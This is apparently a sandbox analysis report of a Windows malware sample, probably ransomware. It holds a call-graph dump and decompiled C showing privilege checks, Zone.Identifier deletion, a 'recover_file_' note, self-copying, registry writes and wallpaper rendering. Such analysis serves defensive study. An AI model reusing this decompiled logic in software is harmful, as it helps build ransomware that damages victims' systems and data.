16739 42891c 16738->16739 16739->16737 16740 42892e 16739->16740 16740->16732 16791 426210 16740->16791 16741->16732 16744 428a60 WriteFile 16741->16744 16744->16732 16745 42895a GetModuleFileNameW 16746 42897b 16745->16746 16749 428987 _wcslen 16745->16749 16748 426210 __wsetenvp 63 API calls 16746->16748 16747 426c91 __invoke_watson 10 API calls 16747->16749 16748->16749 16749->16747 16751 425aa2 63 API calls __NMSG_WRITE 16749->16751 16752 4289fd 16749->16752 16800 425e0c 16749->16800 16751->16749 16809 42d27c 16752->16809 16837 4285bf GetModuleHandleW 16754->16837 
16759 42c816 16757->16759 16760 42c84c 16759->16760 16761 42c82d Sleep 16759->16761 16841 4258f2 16759->16841 16760->16704 16760->16705 16762 42c842 16761->16762 16762->16759 16762->16760 16858 42cc76 LeaveCriticalSection 16763->16858 16765 42cd4d 16765->16706 16768 42d3f4 16766->16768 16767 426d35 _write_string 66 API calls 16769 42d417 16767->16769 16768->16767 16770 42d3fe 16768->16770 16773 426ce3 16769->16773 16770->16723 16776 426cb6 DecodePointer 16773->16776 16777 426ccb 16776->16777 16782 426c91 16777->16782 16779 426ce2 16780 426cb6 __commit 10 API calls 16779->16780 16781 426cef 16780->16781 16781->16723 16785 426b68 16782->16785 16786 426b87 _memset __call_reportfault 16785->16786 16787 426ba5 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16786->16787 16790 426c73 __call_reportfault 16787->16790 16788 4256d3 __write_nolock 5 API calls 16789 426c8f GetCurrentProcess TerminateProcess 16788->16789 16789->16779 16790->16788 16792 426225 16791->16792 16793 42621e 16791->16793 16794 426d35 _write_string 66 API calls 16792->16794 16793->16792 16798 426246 16793->16798 16795 42622a 16794->16795 16796 426ce3 __commit 11 API calls 16795->16796 16797 426234 16796->16797 16797->16745 16797->16749 16798->16797 16799 426d35 _write_string 66 API calls 16798->16799 16799->16795 16804 425e1e 16800->16804 16801 425e22 16802 425e27 16801->16802 16803 426d35 _write_string 66 API calls 16801->16803 16802->16749 16805 425e3e 16803->16805 16804->16801 16804->16802 16807 425e65 16804->16807 16806 426ce3 __commit 11 API calls 16805->16806 16806->16802 16807->16802 16808 426d35 _write_string 66 API calls 16807->16808 16808->16805 16835 42a755 RtlEncodePointer 16809->16835 16811 42d2a2 16812 42d2b2 LoadLibraryW 16811->16812 16813 42d32f 16811->16813 16815 42d3c7 16812->16815 16816 42d2c7 GetProcAddress 16812->16816 16814 42d35c 16813->16814 16818 42d349 DecodePointer DecodePointer 16813->16818 16819 42d392 DecodePointer 16814->16819 16820 42d3bb 
DecodePointer 16814->16820 16826 42d37f 16814->16826 16823 4256d3 __write_nolock 5 API calls 16815->16823 16816->16815 16817 42d2dd 7 API calls 16816->16817 16817->16813 16822 42d31f GetProcAddress EncodePointer 16817->16822 16818->16814 16819->16820 16821 42d399 16819->16821 16820->16815 16821->16820 16825 42d3ac DecodePointer 16821->16825 16822->16813 16824 42d3e6 16823->16824 16824->16732 16825->16820 16825->16826 16826->16820 16828 4256db 16827->16828 16829 4256dd IsDebuggerPresent 16827->16829 16828->16735 16836 42bd80 16829->16836 16832 4269bc SetUnhandledExceptionFilter UnhandledExceptionFilter 16833 4269e1 GetCurrentProcess TerminateProcess 16832->16833 16834 4269d9 __call_reportfault 16832->16834 16833->16735 16834->16833 16835->16811 16836->16832 16838 4285d3 GetProcAddress 16837->16838 16839 4285e8 ExitProcess 16837->16839 16838->16839 16840 4285e3 16838->16840 16840->16839 16842 42596f 16841->16842 16849 425900 16841->16849 16843 428ac7 _malloc DecodePointer 16842->16843 16844 425975 16843->16844 16846 426d35 _write_string 65 API calls 16844->16846 16845 428a7f __FF_MSGBANNER 65 API calls 16850 42590b 16845->16850 16857 425967 16846->16857 16847 42592e RtlAllocateHeap 16847->16849 16847->16857 16848 4288d0 __NMSG_WRITE 65 API calls 16848->16850 16849->16847 16849->16850 16851 42595b 16849->16851 16854 428ac7 _malloc DecodePointer 16849->16854 16855 425959 16849->16855 16850->16845 16850->16848 16850->16849 16853 4285ea __mtinitlocknum 3 API calls 16850->16853 16852 426d35 _write_string 65 API calls 16851->16852 16852->16855 16853->16850 16854->16849 16856 426d35 _write_string 65 API calls 16855->16856 16856->16857 16857->16759 16858->16765 16859->16680 16860->16695 16862 42c7f0 EncodePointer 16861->16862 16862->16862 16863 42c80a 16862->16863 16863->16453 16867 42d0d6 16864->16867 16866 42d11f 16866->16455 16868 42d0e2 __commit 16867->16868 16875 428602 16868->16875 16874 42d103 __commit 16874->16866 16876 42cd4f __lock 66 API calls 16875->16876 16877 
428609 16876->16877 16878 42cfef DecodePointer DecodePointer 16877->16878 16879 42d09e 16878->16879 16880 42d01d 16878->16880 16889 42d10c 16879->16889 16880->16879 16892 42f57c 16880->16892 16882 42d081 EncodePointer EncodePointer 16882->16879 16883 42d02f 16883->16882 16884 42d053 16883->16884 16899 42c89e 16883->16899 16884->16879 16886 42c89e __realloc_crt 70 API calls 16884->16886 16887 42d06f EncodePointer 16884->16887 16888 42d069 16886->16888 16887->16882 16888->16879 16888->16887 16925 42860b 16889->16925 16893 42f587 16892->16893 16894 42f59c HeapSize 16892->16894 16895 426d35 _write_string 66 API calls 16893->16895 16894->16883 16896 42f58c 16895->16896 16897 426ce3 __commit 11 API calls 16896->16897 16898 42f597 16897->16898 16898->16883 16902 42c8a7 16899->16902 16901 42c8e6 16901->16884 16902->16901 16903 42c8c7 Sleep 16902->16903 16904 42666f 16902->16904 16903->16902 16905 426685 16904->16905 16906 42667a 16904->16906 16908 42668d 16905->16908 16916 42669a 16905->16916 16907 4258f2 _malloc 66 API calls 16906->16907 16909 426682 16907->16909 16910 4258b8 _free 66 API calls 16908->16910 16909->16902 16924 426695 __dosmaperr 16910->16924 16911 4266d2 16913 428ac7 _malloc DecodePointer 16911->16913 16912 4266a2 HeapReAlloc 16912->16916 16912->16924 16914 4266d8 16913->16914 16917 426d35 _write_string 66 API calls 16914->16917 16915 426702 16919 426d35 _write_string 66 API calls 16915->16919 16916->16911 16916->16912 16916->16915 16918 428ac7 _malloc DecodePointer 16916->16918 16921 4266ea 16916->16921 16917->16924 16918->16916 16920 426707 GetLastError 16919->16920 16920->16924 16922 426d35 _write_string 66 API calls 16921->16922 16923 4266ef GetLastError 16922->16923 16923->16924 16924->16902 16928 42cc76 LeaveCriticalSection 16925->16928 16927 428612 16927->16874 16928->16927 16930 41f3f0 CoInitializeEx GdiplusStartup 16929->16930 16931 41f2f0 GdipGetImageEncodersSize 16930->16931 16932 41f315 16931->16932 16933 41f31e 16931->16933 16932->16460 16934 
4258f2 _malloc 66 API calls 16933->16934 16935 41f325 16934->16935 16936 41f32e GdipGetImageEncoders 16935->16936 16939 41f38e 16935->16939 16937 41f388 16936->16937 16940 41f341 16936->16940 16938 4258b8 _free 66 API calls 16937->16938 16938->16939 16939->16460 16940->16937 16941 41f39b 16940->16941 16942 4258b8 _free 66 API calls 16941->16942 16943 41f3cc 16942->16943 16943->16460 16945 423410 16944->16945 16946 4233be 16944->16946 16945->16466 16947 4233c0 GetTickCount 16946->16947 17237 42671c 16947->17237 16950 4233cc 16951 42671c 66 API calls 16950->16951 17240 42672e 16950->17240 16952 4233eb Sleep 16951->16952 16952->16947 16953 423402 16952->16953 16953->16466 16955 425ab7 16954->16955 16957 425ab0 16954->16957 16956 426d35 _write_string 66 API calls 16955->16956 16962 425abc 16956->16962 16957->16955 16960 425aec 16957->16960 16958 426ce3 __commit 11 API calls 16959 41f584 16958->16959 16959->16469 16960->16959 16961 426d35 _write_string 66 API calls 16960->16961 16961->16962 16962->16958 16964 4204c5 16963->16964 16965 42046f SetFilePointer ReadFile SetFilePointer ReadFile FindCloseChangeNotification 16963->16965 16964->16478 16965->16478 16967 4204fa 16966->16967 16968 420508 AdjustTokenPrivileges FindCloseChangeNotification 16966->16968 16970 4256d3 __write_nolock 5 API calls 16967->16970 16969 4256d3 __write_nolock 5 API calls 16968->16969 16972 420550 16969->16972 16971 420504 16970->16971 16971->16480 16972->16480 16974 41fc57 SetLastError 16973->16974 16975 41fc6a GetCurrentProcess OpenProcessToken 16973->16975 16974->16483 16976 41fc82 GetLastError 16975->16976 16977 41fc8d GetTokenInformation 16975->16977 16985 41fd01 16976->16985 16978 41fcba LocalAlloc 16977->16978 16979 41fcac GetLastError 16977->16979 16980 41fcd3 GetTokenInformation 16978->16980 16981 41fccc GetLastError 16978->16981 16979->16978 16984 41fcb3 GetLastError 16979->16984 16986 41fce8 GetLastError 16980->16986 16987 41fcef GetSidSubAuthority 16980->16987 16981->16985 16982 
41fd15 16988 41fd23 16982->16988 16989 41fd19 LocalFree 16982->16989 16983 41fd0b CloseHandle 16983->16982 16984->16985 16985->16982 16985->16983 16986->16985 16987->16985 16990 41fd29 SetLastError 16988->16990 16991 41fd3a 16988->16991 16989->16988 16990->16483 16991->16483 16993 41fd5d _memset __write_nolock 16992->16993 16994 4233b0 68 API calls 16993->16994 16995 41fd8f PathFindFileNameW 16994->16995 16996 414320 97 API calls 16995->16996 16997 41fdb9 CreateFileW GetLastError FindCloseChangeNotification 16996->16997 16998 41fea2 16997->16998 16999 41fdf2 16997->16999 17001 4256d3 __write_nolock 5 API calls 16998->17001 17000 414320 97 API calls 16999->17000 17002 41fe11 _memset 17000->17002 17003 41feb0 17001->17003 17004 41fe20 CopyFileW 17002->17004 17005 41fe40 CreateProcessW 17002->17005 17003->16493 17004->17002 17005->17004 17006 41fe88 17005->17006 17007 41fec0 69 API calls 17006->17007 17008 41fe8d 17007->17008 17009 4256d3 __write_nolock 5 API calls 17008->17009 17010 41fe9e 17009->17010 17010->16493 17012 41eb86 _memset 17011->17012 17013 41ebac GetEnvironmentVariableW 17012->17013 17014 41ece5 17013->17014 17015 41ebce 17013->17015 17016 4256d3 __write_nolock 5 API calls 17014->17016 17015->17014 17248 41eaf0 17015->17248 17018 41ecf4 17016->17018 17018->16492 17020 426210 __wsetenvp 66 API calls 17021 41ec18 17020->17021 17022 425aa2 __NMSG_WRITE 66 API calls 17021->17022 17023 41ec2e 17022->17023 17024 425aa2 __NMSG_WRITE 66 API calls 17023->17024 17025 41ec44 _memset 17024->17025 17026 41ec54 ShellExecuteExW 17025->17026 17027 41ecd7 CloseHandle 17026->17027 17028 41ecaa 17026->17028 17027->17014 17029 41ecb8 GetLastError 17028->17029 17030 41ecc1 Sleep ShellExecuteExW 17029->17030 17031 41ecd5 17029->17031 17030->17029 17030->17031 17031->17027 17033 412fe9 17032->17033 17047 413007 17032->17047 17034 413162 17033->17034 17035 412ff6 17033->17035 17038 4256d3 __write_nolock 5 API calls 17034->17038 17037 412ffd 17035->17037 17035->17047 17036 
412fc0 6 API calls 17043 4130d8 17036->17043 17252 412c10 GetPEB 17037->17252 17041 413171 17038->17041 17039 413103 17045 4256d3 __write_nolock 5 API calls 17039->17045 17040 413002 17040->17039 17260 412ee0 17040->17260 17041->16498 17043->17040 17048 412fc0 6 API calls 17043->17048 17046 413113 17045->17046 17046->16498 17047->17036 17047->17040 17048->17040 17050 401482 _memset 17049->17050 17278 401230 17050->17278 17052 40148a 17303 4010c0 17052->17303 17054 4014d2 17055 4014e3 17054->17055 17318 4014f0 17054->17318 17354 4019c0 17055->17354 17061 41fff0 RegCreateKeyExA RegSetValueExW RegFlushKey RegCloseKey 17062 412fc0 6 API calls 17061->17062 17063 420060 17062->17063 17064 412fc0 6 API calls 17063->17064 17065 4200b2 RegFlushKey 17064->17065 17067 412fc0 6 API calls 17065->17067 17068 4200e2 17067->17068 17069 412fc0 6 API calls 17068->17069 17070 4200f6 17069->17070 17071 412fc0 6 API calls 17070->17071 17072 420142 RegFlushKey 17071->17072 17074 412fc0 6 API calls 17072->17074 17075 41f729 17074->17075 17075->16509 17077 41f1d7 _memset 17076->17077 17078 412fc0 6 API calls 17077->17078 17079 41f20b WaitForSingleObject CloseHandle CloseHandle Sleep 17078->17079 17081 41f25f 17079->17081 17081->16514 17084 41eef0 _memset 17082->17084 17083 4258f2 _malloc 66 API calls 17083->17084 17084->17083 17085 425a43 _strcpy_s 66 API calls 17084->17085 17086 41ef33 17084->17086 17085->17084 17087 4258f2 _malloc 66 API calls 17086->17087 17088 41ef3d 17087->17088 17089 4258f2 _malloc 66 API calls 17088->17089 17090 41ef4c 17089->17090 17091 4258f2 _malloc 66 API calls 17090->17091 17092 41ef5b 17091->17092 17093 4258f2 _malloc 66 API calls 17092->17093 17094 41ef6a 17093->17094 17095 4258f2 _malloc 66 API calls 17094->17095 17096 41ef79 17095->17096 17097 4258f2 _malloc 66 API calls 17096->17097 17098 41ef88 17097->17098 17099 4258f2 _malloc 66 API calls 17098->17099 17100 41ef97 17099->17100 17101 4258f2 _malloc 66 API calls 17100->17101 17102 41efa6 17101->17102 
17104 41efea _memmove 17102->17104 18220 4128b0 17102->18220 17105 4128b0 6 API calls 17104->17105 17106 41f011 _memmove 17105->17106 17107 4128b0 6 API calls 17106->17107 17108 41f035 _memmove 17107->17108 17109 4128b0 6 API calls 17108->17109 17110 41f059 _memmove 17109->17110 17111 4128b0 6 API calls 17110->17111 17112 41f080 _memmove 17111->17112 17113 4128b0 6 API calls 17112->17113 17114 41f0a4 _memmove 17113->17114 17115 4128b0 6 API calls 17114->17115 17116 41f0c8 _memmove 17115->17116 17117 4128b0 6 API calls 17116->17117 17118 41f0ef _memmove 17117->17118 17119 4128b0 6 API calls 17118->17119 17120 41f116 17119->17120 17121 4258f2 _malloc 66 API calls 17120->17121 17122 41f127 _memmove 17121->17122 17123 4128b0 6 API calls 17122->17123 17124 41f149 17123->17124 17125 425d1d _strcat_s 66 API calls 17124->17125 17126 41f15f 17125->17126 17127 4258f2 _malloc 66 API calls 17126->17127 17128 41f170 _memmove 17127->17128 17129 4128b0 6 API calls 17128->17129 17130 41f195 17129->17130 17131 425d1d _strcat_s 66 API calls 17130->17131 17132 41f1aa 17131->17132 17133 420730 17132->17133 17134 425898 __strftime_l 97 API calls 17133->17134 17135 41f804 17134->17135 17135->16526 17137 42645b 17136->17137 17138 426448 17136->17138 18300 42637d 17137->18300 17139 426d35 _write_string 66 API calls 17138->17139 17141 42644d 17139->17141 17142 426ce3 __commit 11 API calls 17141->17142 17143 41f903 17142->17143 17143->16536 17146 426482 17143->17146 17144 42646b 17144->17143 17145 426d35 _write_string 66 API calls 17144->17145 17145->17143 17147 42648e __commit 17146->17147 17148 4264a1 17147->17148 17150 4264c5 17147->17150 17149 426d35 _write_string 66 API calls 17148->17149 17151 4264a6 17149->17151 18698 428bc6 17150->18698 17153 426ce3 __commit 11 API calls 17151->17153 17158 4264b1 __commit 17153->17158 17155 42b437 __fflush_nolock 66 API calls 17165 4264de 17155->17165 17157 428ca4 __stbuf 66 API calls 17159 426552 17157->17159 17158->16532 17160 426d7e __output_l 
102 API calls 17159->17160 17161 426562 17160->17161 17163 428d40 __ftbuf 97 API calls 17161->17163 17162 426d35 _write_string 66 API calls 17166 426538 17162->17166 17164 42656c 17163->17164 18704 426584 17164->18704 17165->17162 17168 426543 17165->17168 17167 426ce3 __commit 11 API calls 17166->17167 17167->17168 17168->17157 17168->17164 17170 426607 __commit 17169->17170 17171 426619 17170->17171 17172 42662e 17170->17172 17173 426d35 _write_string 66 API calls 17171->17173 17175 428bc6 __lock_file 67 API calls 17172->17175 17180 426629 __commit 17172->17180 17174 42661e 17173->17174 17177 426ce3 __commit 11 API calls 17174->17177 17176 426647 17175->17176 18707 42658e 17176->18707 17177->17180 17180->16536 17183 4205ac CreateCompatibleDC 17182->17183 17184 4205fd ReleaseDC 17182->17184 17185 4205fa 17183->17185 17186 4205b9 SelectObject SetBkMode SetTextColor 17183->17186 17187 420620 17184->17187 17188 42060c 17184->17188 17185->17184 18757 420180 7 API calls 17186->18757 17187->16533 17188->17187 17190 420610 DeleteObject 17188->17190 17190->16533 17191 4205e1 SelectObject DeleteDC 17191->17185 17193 425cfd __strftime_l 97 API calls 17192->17193 17194 41433a 17193->17194 17195 41fb80 CreateFileW 17194->17195 17196 41fa39 17195->17196 17197 41fbac WriteFile CloseHandle 17195->17197 17199 420750 17196->17199 17197->17196 17200 420792 17199->17200 17201 42081f 17200->17201 17202 412fc0 6 API calls 17200->17202 17203 412ee0 6 API calls 17201->17203 17204 420808 17202->17204 17205 420830 17203->17205 17204->17201 17208 412fc0 6 API calls 17204->17208 17206 4256d3 __write_nolock 5 API calls 17205->17206 17207 41fa4a 17206->17207 17207->16549 17208->17201 17210 41fa7a 17209->17210 17211 41fc0c WriteFile CloseHandle 17209->17211 17210->16553 17211->17210 17243 42a905 17237->17243 17241 42a905 __getptd 66 API calls 17240->17241 17242 426733 17241->17242 17242->16950 17244 42a88c __getptd_noexit 66 API calls 17243->17244 17245 42a90d 17244->17245 17246 426726 
17245->17246 17247 42888c __amsg_exit 66 API calls 17245->17247 17246->16950 17247->17246 17249 41eafd 17248->17249 17250 41eb2c 17249->17250 17251 41eb0e _vsnwprintf 17249->17251 17250->17014 17250->17020 17251->17250 17253 412d62 17252->17253 17256 412c5f 17252->17256 17254 4256d3 __write_nolock 5 API calls 17253->17254 17255 412d71 17254->17255 17255->17040 17256->17253 17257 412d75 17256->17257 17258 4256d3 __write_nolock 5 API calls 17257->17258 17259 412d85 17258->17259 17259->17040 17262 412f0b 17260->17262 17261 412f73 17261->17039 17262->17261 17262->17262 17264 412d90 17262->17264 17265 412db3 17264->17265 17266 412dc6 17264->17266 17267 4256d3 __write_nolock 5 API calls 17265->17267 17266->17265 17269 412e14 17266->17269 17270 412e01 17266->17270 17268 412dc2 17267->17268 17268->17261 17269->17265 17273 412e1e 17269->17273 17271 4256d3 __write_nolock 5 API calls 17270->17271 17272 412e10 17271->17272 17272->17261 17274 412fc0 6 API calls 17273->17274 17275 412ebe 17274->17275 17276 4256d3 __write_nolock 5 API calls 17275->17276 17277 412ece 17276->17277 17277->17261 17360 42c770 17278->17360 17281 401353 RegCreateKeyExW RegQueryValueExW 17283 4013da 17281->17283 17292 401390 RegSetValueExW RegFlushKey 17281->17292 17282 401298 RegQueryValueExW 17282->17281 17284 4012ba 17282->17284 17286 401cd0 97 API calls 17283->17286 17362 401cd0 17284->17362 17289 40140e 17286->17289 17291 401cd0 97 API calls 17289->17291 17290 401cd0 97 API calls 17293 401321 17290->17293 17294 401441 17291->17294 17292->17283 17296 425aa2 __NMSG_WRITE 66 API calls 17293->17296 17295 425aa2 __NMSG_WRITE 66 API calls 17294->17295 17298 401451 RegCloseKey 17295->17298 17297 401331 RegCloseKey 17296->17297 17299 4256d3 __write_nolock 5 API calls 17297->17299 17300 4256d3 __write_nolock 5 API calls 17298->17300 17301 40134f 17299->17301 17302 40146c 17300->17302 17301->17052 17302->17052 17304 4010ea _memset 17303->17304 17592 401cb0 17304->17592 17309 401209 17314 4256d3 __write_nolock 
19879->19883 19880->19849 19884 4258f2 _malloc 66 API calls 19881->19884 19888 42d816 _wcslwr_s_l_stat 19881->19888 19885 425ed9 __freea 66 API calls 19882->19885 19883->19882 19886 42d882 19883->19886 19884->19888 19885->19877 19887 42d88c 19886->19887 19891 42d8b5 19886->19891 19887->19882 19889 42d8a0 LCMapStringW 19887->19889 19888->19877 19888->19879 19889->19882 19890 42d904 LCMapStringW 19893 42d91a WideCharToMultiByte 19890->19893 19894 42d93c 19890->19894 19892 4258f2 _malloc 66 API calls 19891->19892 19895 42d8d0 _wcslwr_s_l_stat 19891->19895 19892->19895 19893->19894 19896 425ed9 __freea 66 API calls 19894->19896 19895->19882 19895->19890 19896->19882 19898->19840 19927 425d9a 19930 425d8a 19927->19930 19929 425da7 ctype 19933 429bcb 19930->19933 19932 425d98 19932->19929 19934 429bd7 __commit 19933->19934 19935 42cd4f __lock 66 API calls 19934->19935 19938 429bde 19935->19938 19936 429c17 19943 429c32 19936->19943 19938->19936 19939 429c0e 19938->19939 19942 4258b8 _free 66 API calls 19938->19942 19941 4258b8 _free 66 API calls 19939->19941 19940 429c28 __commit 19940->19932 19941->19936 19942->19939 19946 42cc76 LeaveCriticalSection 19943->19946 19945 429c39 19945->19940 19946->19945 19618 42a91f 19620 42a92b __commit 19618->19620 19619 42a943 19623 4258b8 _free 66 API calls 19619->19623 19626 42a951 19619->19626 19620->19619 19621 42aa2d __commit 19620->19621 19622 4258b8 _free 66 API calls 19620->19622 19622->19619 19623->19626 19624 42a95f 19625 42a96d 19624->19625 19628 4258b8 _free 66 API calls 19624->19628 19629 42a97b 19625->19629 19630 4258b8 _free 66 API calls 19625->19630 19626->19624 19627 4258b8 _free 66 API calls 19626->19627 19627->19624 19628->19625 19631 42a989 19629->19631 19632 4258b8 _free 66 API calls 19629->19632 19630->19629 19633 42a997 19631->19633 19635 4258b8 _free 66 API calls 19631->19635 19632->19631 19634 42a9a8 19633->19634 19636 4258b8 _free 66 API calls 19633->19636 19637 42cd4f __lock 66 API calls 19634->19637 
19635->19633 19636->19634 19638 42a9b0 19637->19638 19639 42a9d5 19638->19639 19640 42a9bc InterlockedDecrement 19638->19640 19654 42aa39 19639->19654 19640->19639 19641 42a9c7 19640->19641 19641->19639 19645 4258b8 _free 66 API calls 19641->19645 19644 42cd4f __lock 66 API calls 19646 42a9e9 19644->19646 19645->19639 19647 42aa1a 19646->19647 19648 42a4ab ___removelocaleref 8 API calls 19646->19648 19657 42aa45 19647->19657 19652 42a9fe 19648->19652 19651 4258b8 _free 66 API calls 19651->19621 19652->19647 19653 42a544 ___freetlocinfo 66 API calls 19652->19653 19653->19647 19660 42cc76 LeaveCriticalSection 19654->19660 19656 42a9e2 19656->19644 19661 42cc76 LeaveCriticalSection 19657->19661 19659 42aa27 19659->19651 19660->19656 19661->19659 19951 428ba6 19958 42b778 19951->19958 19954 428bb9 19956 4258b8 _free 66 API calls 19954->19956 19957 428bc4 19956->19957 19971 42b69e 19958->19971 19960 428bab 19960->19954 19961 42d427 19960->19961 19962 42d433 __commit 19961->19962 19963 42cd4f __lock 66 API calls 19962->19963 19964 42d43f 19963->19964 19965 42d4a5 19964->19965 19967 42d47a DeleteCriticalSection 19964->19967 19968 4265fb __fcloseall 102 API calls 19964->19968 19988 42d4ba 19965->19988 19969 4258b8 _free 66 API calls 19967->19969 19968->19964 19969->19964 19970 42d4b1 __commit 19970->19954 19972 42b6aa __commit 19971->19972 19973 42cd4f __lock 66 API calls 19972->19973 19980 42b6b9 19973->19980 19974 42b751 19984 42b76f 19974->19984 19976 428c07 __getstream 67 API calls 19976->19980 19977 42b75d __commit 19977->19960 19979 42b656 101 API calls __fflush_nolock 19979->19980 19980->19974 19980->19976 19980->19979 19981 42b740 19980->19981 19982 428c75 __getstream 2 API calls 19981->19982 19983 42b74e 19982->19983 19983->19980 19987 42cc76 LeaveCriticalSection 19984->19987 19986 42b776 19986->19977 19987->19986 19991 42cc76 LeaveCriticalSection 19988->19991 19990 42d4c1 19990->19970 19991->19990

                    Executed Functions

                    Control-flow Graph

                    control_flow_graph 0 41f3e0-41f469 call 42dfb0 CoInitializeEx GdiplusStartup call 41f2f0 AllocateAndInitializeSid 5 41f493-41f640 SHGetFolderPathW call 4233b0 LoadLibraryW LoadStringW * 2 GetModuleHandleW GetProcAddress * 2 SHGetFolderPathW * 3 SHGetSpecialFolderPathW call 425aa2 * 3 SHGetFolderPathW * 3 GetModuleFileNameW call 426210 call 425aa2 DeleteFileW call 420440 LookupPrivilegeValueA 0->5 6 41f46b-41f47e CheckTokenMembership 0->6 23 41f642-41f646 call 4204d0 5->23 24 41f64b-41f65a call 41fc40 5->24 8 41f480 6->8 9 41f484-41f48f FreeSid 6->9 8->9 9->5 23->24 28 41f6c8-41f6cf call 41fd50 24->28 29 41f65c-41f665 24->29 40 41f6d1-41f6f5 call 412fc0 GetLastError 28->40 41 41f679-41f692 call 4256d3 28->41 30 41f695-41f69a 29->30 31 41f667 29->31 33 41f6a3 call 41fd50 30->33 36 41f69c-41f6a1 30->36 31->33 34 41f669-41f66b 31->34 42 41f6a8-41f6aa 33->42 38 41f674 call 41eb60 34->38 39 41f66d-41f672 34->39 36->33 36->40 38->41 39->38 39->40 40->41 52 41f6f7-41f8c0 call 42c770 GetVersionExW call 401470 call 41fff0 call 412fc0 CreateThread call 41f1c0 * 5 call 41eee0 call 420730 * 2 call 42c770 40->52 42->40 46 41f6ac-41f6c5 call 4256d3 42->46 80 41f8c5-41f8eb 52->80 80->80 81 41f8ed-41f908 call 42643b 80->81 84 41f90a-41f939 call 426482 call 4265fb 81->84 85 41f93c-41f95b call 420560 81->85 84->85 91 41f996-41f9a4 call 423420 85->91 92 41f95d-41f969 GdipAlloc 85->92 99 41f9a6-41f9c8 call 412fc0 91->99 100 41f9ca-41face CreateThread SetThreadPriority WaitForSingleObject call 42c770 call 414320 call 41fb80 call 420750 call 414320 call 41fbe0 call 420750 call 414320 GdipSaveImageToFile 91->100 94 41f96b-41f98c GdipCreateBitmapFromHBITMAP 92->94 95 41f98e 92->95 97 41f990 94->97 95->97 97->91 99->100 120 41fad0 100->120 121 41fad3-41fb76 call 420750 call 412fc0 * 4 call 41fec0 call 4256d3 100->121 120->121
                    C-Code - Quality: 43%
                    			E0041F3E0(void* __eflags, char _a8, char _a12, intOrPtr _a14, struct _SID_IDENTIFIER_AUTHORITY _a16, intOrPtr _a18, short _a20, intOrPtr _a22, char _a24, intOrPtr _a26, short _a30, char _a316, char _a332, char _a334, signed int _a8448, signed int _a8572, signed int _a8748) {
                    				struct _SECURITY_ATTRIBUTES* _v16;
                    				void* _v20;
                    				struct _SECURITY_ATTRIBUTES* _v28;
                    				void* _v32;
                    				char _v64;
                    				struct _LUID _v140;
                    				char _v143;
                    				char _v144;
                    				intOrPtr _v168;
                    				intOrPtr _v172;
                    				char _v176;
                    				char _v180;
                    				long _v200;
                    				char _v208;
                    				void* _v220;
                    				intOrPtr _v232;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t71;
                    				int _t76;
                    				_Unknown_base(*)()* _t85;
                    				intOrPtr _t100;
                    				int _t101;
                    				void* _t102;
                    				signed int _t103;
                    				intOrPtr* _t106;
                    				long _t108;
                    				intOrPtr* _t113;
                    				signed int _t127;
                    				signed int _t130;
                    				signed int _t133;
                    				signed int _t150;
                    				intOrPtr* _t152;
                    				intOrPtr* _t154;
                    				intOrPtr* _t156;
                    				void* _t157;
                    				intOrPtr* _t158;
                    				intOrPtr* _t163;
                    				intOrPtr _t168;
                    				signed int _t169;
                    				void* _t176;
                    				void* _t180;
                    				void* _t181;
                    				void* _t182;
                    				char* _t189;
                    				void* _t220;
                    				struct HINSTANCE__* _t222;
                    				struct HINSTANCE__* _t223;
                    				void* _t224;
                    				signed int _t225;
                    				void* _t226;
                    				void* _t227;
                    				void* _t228;
                    				void* _t229;
                    				intOrPtr* _t230;
                    				void* _t231;
                    				signed char* _t232;
                    				void* _t233;
                    				signed int _t234;
                    				void* _t236;
                    				signed int _t237;
                    				void* _t238;
                    				signed int _t240;
                    				signed int _t241;
                    				void* _t247;
                    				signed int _t248;
                    				void* _t257;
                    				void* _t258;
                    				void* _t263;
                    				void* _t274;
                    
                    				_t241 = _t240 & 0xfffffff8;
                    				E0042DFB0(0x2234);
                    				_t71 =  *0x43d01c; // 0xe0063daa
                    				_a8748 = _t71 ^ _t241;
                    				__imp__CoInitializeEx(0, 0, _t220, _t229, _t176); // executed
                    				_a8 = 1;
                    				_a12 = 0;
                    				_a16.Value = 0;
                    				_a20 = 0;
                    				__imp__GdiplusStartup( &_a24,  &_a8, 0); // executed
                    				E0041F2F0();
                    				_v16 = 0;
                    				_a16.Value = 0;
                    				_a20 = 0x500;
                    				_t76 = AllocateAndInitializeSid( &_a16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v20);
                    				_v16 = _t76;
                    				if(_t76 != 0) {
                    					__imp__CheckTokenMembership(0, _v20,  &_v16);
                    					if(_t76 == 0) {
                    						_v28 = 0;
                    					}
                    					FreeSid(_v32);
                    					_t76 = _v28;
                    				}
                    				_t230 = __imp__SHGetFolderPathW;
                    				 *0x480450 = _t76; // executed
                    				 *_t230(0, 0x1a, 0, 0, 0x46c450); // executed
                    				_a12 = 0;
                    				_a14 = 0;
                    				_a18 = 0;
                    				_a22 = 0;
                    				_a26 = 0;
                    				_a30 = 0;
                    				E004233B0( &_a12, 9); // executed
                    				_t222 = LoadLibraryW(L"Shell32.dll");
                    				LoadStringW(_t222, 0x5509, 0x470450, 0xff); // executed
                    				LoadStringW(_t222, 0x5527, 0x472450, 0xff);
                    				_t223 = GetModuleHandleW(L"KERNEL32");
                    				 *0x480454 = GetProcAddress(_t223, "Wow64DisableWow64FsRedirection");
                    				_t85 = GetProcAddress(_t223, "Wow64RevertWow64FsRedirection");
                    				 *0x480458 = _t85; // executed
                    				 *_t230(0, 0x24, 0, 0, 0x476450); // executed
                    				 *_t230(0, 0x26, 0, 0, 0x478450); // executed
                    				 *_t230(0, 0x3b, 0, 0, 0x47c450); // executed
                    				__imp__SHGetSpecialFolderPathW(0, 0x47e450, 5, 0); // executed
                    				E00425AA2(0x47e450, 0x1000, L"\\recover_file_");
                    				E00425AA2(0x47e450, 0x1000,  &_v64);
                    				E00425AA2(0x47e450, 0x1000, L".txt");
                    				 *_t230(0, 0x10, 0, 0, 0x46e450); // executed
                    				 *_t230(0, 0x19, 0, 0, 0x474450); // executed
                    				 *_t230(0, 0x23, 0, 0, 0x47a450); // executed
                    				GetModuleFileNameW(0, 0x46a450, 0x1000);
                    				E00426210(0x468450, 0x1000, 0x46a450);
                    				E00425AA2(0x468450, 0x1000, L":Zone.Identifier");
                    				_t247 = _t241 + 0x44;
                    				DeleteFileW(0x468450); // executed
                    				_t100 = E00420440(); // executed
                    				 *0x460a78 = _t100; // executed
